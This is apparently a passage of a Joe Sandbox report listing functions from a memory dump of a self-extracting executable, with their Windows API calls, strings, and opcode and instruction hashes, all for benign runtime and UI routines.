Instruction ID: 70f57c23d4a4ac7b521c1bc3448bbcd416d988a6d09416855f5689458fd11b9d
Opcode Fuzzy Hash: 7399b38aff369f9d13fb846c6dbddc85301b6d9ff1c45b3086e6f11bbdbe2b2a
Instruction Fuzzy Hash: 204155305447466FE3308B20CC46BDABBE0FB02724F104759F6F8921D0E774A988CB95

Function 00B8AC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B8AC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B8AC96
IsDialogMessageW.USER32(0001040E,?), ref: 00B8ACAA
TranslateMessage.USER32(?), ref: 00B8ACB8
DispatchMessageW.USER32(?), ref: 00B8ACC2

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 5a41fc1d2ca61813f2a1a8f342551b1a09c16ca651317cf2a96b126435c55295
Instruction ID: b15df52c34abbe13ea38117c1466eaeb04511f7643267920a4e8623970fa2683
Opcode Fuzzy Hash: 5a41fc1d2ca61813f2a1a8f342551b1a09c16ca651317cf2a96b126435c55295
Instruction Fuzzy Hash: 25F03071D02169AB9B20ABE2DC4CDEBBFACEE152517408456F809D3110FF38D405CBB1

Function 00B9B188 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B98FA5: GetLastError.KERNEL32(?,00BB0EE8,00B93E14,00BB0EE8,?,?,00B93713,00000050,?,00BB0EE8,00000200), ref: 00B98FA9
Part of subcall function 00B98FA5: _free.LIBCMT ref: 00B98FDC
Part of subcall function 00B98FA5: SetLastError.KERNEL32(00000000,?,00BB0EE8,00000200), ref: 00B9901D
Part of subcall function 00B98FA5: _abort.LIBCMT ref: 00B99023

Part of subcall function 00B9B2AE: _abort.LIBCMT ref: 00B9B2E0
Part of subcall function 00B9B2AE: _free.LIBCMT ref: 00B9B314

Part of subcall function 00B9AF1B: GetOEMCP.KERNEL32(00000000,?,?,00B9B1A5,?), ref: 00B9AF46

_free.LIBCMT ref: 00B9B200
_free.LIBCMT ref: 00B9B236

Strings

X ~, xrefs: 00B9B27F
X ~, xrefs: 00B9B27A

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: X ~$X ~
API String ID: 2991157371-2749242574
Opcode ID: b46b7edb3702a3abb7062b7d42fa88d7fb556f7bfbc1d4a92d8731169e30d6ee
Instruction ID: 6ff7727f07b5c70e63f50d100f7c80f1af132073b54d86e88db7a7adb8aac322
Opcode Fuzzy Hash: b46b7edb3702a3abb7062b7d42fa88d7fb556f7bfbc1d4a92d8731169e30d6ee
Instruction Fuzzy Hash: 4031B631904208AFDF10EFA9E955F6DBBE5EF46320F2540F9E4149B291EB719D41CB50

Function 00B8A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00B8A2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 00B8A315

Part of subcall function 00B817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B7BB05,00000000,.exe,?,?,00000800,?,?,00B885DF,?), ref: 00B817C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B8A305

Strings

EDIT, xrefs: 00B8A2E9, 00B8A2F4, 00B8A301

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 4f438da49ac3f346a5c9316130429244882a420dd152b158856700dbe239c9c6
Instruction ID: 0c8b98cebf3b9691db930400cd09d8249345bf76bbd2a714a83547babdad8e57
Opcode Fuzzy Hash: 4f438da49ac3f346a5c9316130429244882a420dd152b158856700dbe239c9c6
Instruction Fuzzy Hash: 24F08232A022287BE72067649C05F9BB7ACDB46B10F080097BD05B3190EB609D41C6FA

Function 00B8D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B8D29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B8D2D9

Strings

sfxpar, xrefs: 00B8D2D4
sfxcmd, xrefs: 00B8D298

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: b6f09ebe61711569e762734639bd868f7dcbc17733456369f79a695db62c64d0
Instruction ID: d9a585d0c9ecea8003d47a10044820ca8f76880486deb2bfb92d3b2eba86112a
Opcode Fuzzy Hash: b6f09ebe61711569e762734639bd868f7dcbc17733456369f79a695db62c64d0
Instruction Fuzzy Hash: E1F0A772800228A6C7313F90DC0AABA77D8EF0AB51B0040D2FC48A6161DA60CD40E7F5

Function 00B7984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B7985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00B79876
GetLastError.KERNEL32 ref: 00B798A8
GetLastError.KERNEL32 ref: 00B798C7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: dbc3c12f00ad500eea0aaf33593be3d1836e722f4c9b5b2ffc0a53f381693e41
Instruction ID: dfb059921f842d4161faa84c103aa57950ade8de43f876a7e9e07f42d367e95c
Opcode Fuzzy Hash: dbc3c12f00ad500eea0aaf33593be3d1836e722f4c9b5b2ffc0a53f381693e41
Instruction Fuzzy Hash: AA118230900604EBDB305B55C845A7977E8FB0BBB1F10C6AAF47E96690DB359E40AF63

Function 00B9A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B93713,00000000,00000000,?,00B9A49B,00B93713,00000000,00000000,00000000,?,00B9A698,00000006,FlsSetValue), ref: 00B9A526
GetLastError.KERNEL32(?,00B9A49B,00B93713,00000000,00000000,00000000,?,00B9A698,00000006,FlsSetValue,00BA7348,00BA7350,00000000,00000364,?,00B99077), ref: 00B9A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B9A49B,00B93713,00000000,00000000,00000000,?,00B9A698,00000006,FlsSetValue,00BA7348,00BA7350,00000000), ref: 00B9A540

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: cfac320320e9c6a0bc04bad1ff864acd405ebc7ab3f50c2679ff5bb15378c789
Instruction ID: 0f21730ef1235e3b9952da34353df7b6d7277b1886b3c78ea36e63fd12981ac7
Opcode Fuzzy Hash: cfac320320e9c6a0bc04bad1ff864acd405ebc7ab3f50c2679ff5bb15378c789
Instruction Fuzzy Hash: E3012B32711222ABCF318B689C85B67BBDCEF66FA17260670F906D3140DB31D900C6E1

Function 00B79F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00B7CC94,00000001,?,?,?,00000000,00B84ECD,?,?,?), ref: 00B79F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00B84ECD,?,?,?,?,?,00B84972,?), ref: 00B79F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00B7CC94,00000001,?,?), ref: 00B79FB8

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 1d4faf5058cd9384e432a8725f3df8574504ed2fd6cd18e52aee6c7769a72341
Instruction ID: 027ba89bb61f0b5d1dd7aa59cb870bdddb5b4e2787a5cbc98c6106b5dcab6e0e
Opcode Fuzzy Hash: 1d4faf5058cd9384e432a8725f3df8574504ed2fd6cd18e52aee6c7769a72341
Instruction Fuzzy Hash: F131E7712083059BDF149F14DC4476ABBE4EB91710F04899DF869DB181CB74ED48CBB2

Function 00B7A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B7A113,?,00000001,00000000,?,?), ref: 00B7A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B7A113,?,00000001,00000000,?,?), ref: 00B7A261
GetLastError.KERNEL32(?,?,?,?,00B7A113,?,00000001,00000000,?,?), ref: 00B7A27E

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 8309e7222d5b0eed528238faacf9b3d80ab4952b5e327b898474cca77c0c6069
Instruction ID: 10dc04f79a1bfd0a3701adbcd95cb5e6fa6e909148f6ed7696befaf0ce5e7e86
Opcode Fuzzy Hash: 8309e7222d5b0eed528238faacf9b3d80ab4952b5e327b898474cca77c0c6069
Instruction Fuzzy Hash: C5019231140218A6DBB2AB744C46BED73C8EF47B41F04C4D5F929E6052DB66DA81CAA7

Function 00B9AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B9B019

Strings

, xrefs: 00B9B05E

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 63f6032d25256a7c122ff95f4d43e98358f4ea19b39902dc5cdfca0ce53ff18e
Instruction ID: af44232ff39cb13d8d5d3bcfdcf0b0251c2e058eb0e0229475a2c184badf1d32
Opcode Fuzzy Hash: 63f6032d25256a7c122ff95f4d43e98358f4ea19b39902dc5cdfca0ce53ff18e
Instruction Fuzzy Hash: C641357050439CABDF228A249D95FFBBBE9EB45704F1404FCE59A97142D335AA45CF20

Function 00B9A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00B9A79D

Strings

LCMapStringEx, xrefs: 00B9A73D, 00B9A747

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 5d81a9cb42148b0ca50186647901e18adb46f700ee08aca4fa06563ba73302f8
Instruction ID: 7359a10e45f7acd33972fb4e4899e5851ab83423412329ebfb4af18a3c3a9d95
Opcode Fuzzy Hash: 5d81a9cb42148b0ca50186647901e18adb46f700ee08aca4fa06563ba73302f8
Instruction Fuzzy Hash: AE01D332548209BBCF02AFA4DC06DEE7FB6EF09750F0541A4FE1426160CA768931EB95

Function 00B9A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B99D2F), ref: 00B9A715

Strings

InitializeCriticalSectionEx, xrefs: 00B9A6E5

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: e560697a55af3544ba4a1d4d6c95e78016eb18b78c5b4ccbd1a8928a73545f23
Instruction ID: 1527651db4337d1b08ce454c4424afcbb3d47a6aea8cfd1dcc2f07aab3e8197a
Opcode Fuzzy Hash: e560697a55af3544ba4a1d4d6c95e78016eb18b78c5b4ccbd1a8928a73545f23
Instruction Fuzzy Hash: 73F09A31649218BBCF11AF64CC06DAE7FE1EB06B60B0080A4FC192A260DE718E11AB95

Function 00B9A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00B9A5AE

Strings

FlsAlloc, xrefs: 00B9A58A

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 6217c39cb5d1dfafdd055a7c4bf5836d3ec8c26917fc165d8451ddbb1f212d71
Instruction ID: 689c43dacfd0423bc953181553aac291b9b70abe19380f5cb3ac396306d7fa97
Opcode Fuzzy Hash: 6217c39cb5d1dfafdd055a7c4bf5836d3ec8c26917fc165d8451ddbb1f212d71
Instruction Fuzzy Hash: 42E0E571B892286B8A246B649C069AEBBD4DB27B10B4241E5FC0567250DE708E0196DA

Function 00B9329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00B932AF

Strings

FlsAlloc, xrefs: 00B9329E, 00B932A8

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 59b6d5968aa8a669a77389644c34873819f78b4121cb48ffa797b9e9e160ebd1
Instruction ID: efbe06960d4c1c6152c114e3bc44274fdb79d4fd057d52efc0e0a21baf37c1fb
Opcode Fuzzy Hash: 59b6d5968aa8a669a77389644c34873819f78b4121cb48ffa797b9e9e160ebd1
Instruction Fuzzy Hash: 43D05B227856346AD52036D96C039EE7EC4C703FF5F4501E2FF0C6A17395A1875146D5

Function 00B8E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8E20B

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Strings

3Ro, xrefs: 00B8E1F9, 00B8E205

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: 4929d2319aef9db70f7c2914c907d02c3f32d247d3cfbed8440bc33388d11b5d
Instruction ID: 4f63c89a39deb57272fc60b666c4682f7a4c1814b51f949eb1b7c6af1130b1bf
Opcode Fuzzy Hash: 4929d2319aef9db70f7c2914c907d02c3f32d247d3cfbed8440bc33388d11b5d
Instruction Fuzzy Hash: DCB012A226E001BC320C36017D06C3603ECC4C0B5133084DFB225D40E1A540DC05D132

Function 00B9B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00B9AF1B: GetOEMCP.KERNEL32(00000000,?,?,00B9B1A5,?), ref: 00B9AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B9B1EA,?,00000000), ref: 00B9B3C4
GetCPInfo.KERNEL32(00000000,00B9B1EA,?,?,?,00B9B1EA,?,00000000), ref: 00B9B3D7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: f1ec435392ea14d4b7d962c7966f32b31834057ef3225d08e363347e429e4f32
Instruction ID: 65e39dcefa4aba3cbcc2355b456edc964797821ac3ba14396662d59508f478c4
Opcode Fuzzy Hash: f1ec435392ea14d4b7d962c7966f32b31834057ef3225d08e363347e429e4f32
Instruction Fuzzy Hash: A95132709002059FDF209F75E991ABABBE5EF51310F1880FED0968B362D739D942EB90

Function 00B71385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B71385

Part of subcall function 00B76057: __EH_prolog.LIBCMT ref: 00B7605C

Part of subcall function 00B7C827: __EH_prolog.LIBCMT ref: 00B7C82C
Part of subcall function 00B7C827: new.LIBCMT ref: 00B7C86F
Part of subcall function 00B7C827: new.LIBCMT ref: 00B7C893

new.LIBCMT ref: 00B713FE

Part of subcall function 00B7B07D: __EH_prolog.LIBCMT ref: 00B7B082

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a29753797f4e2ff6d917350b790bd2ee4c09c0fc6e759adb081e80ea802825e3
Instruction ID: 6691c1f589b464ebd2f2858c43455cb3101e71b7bb01ac1bd415f913fb866bda
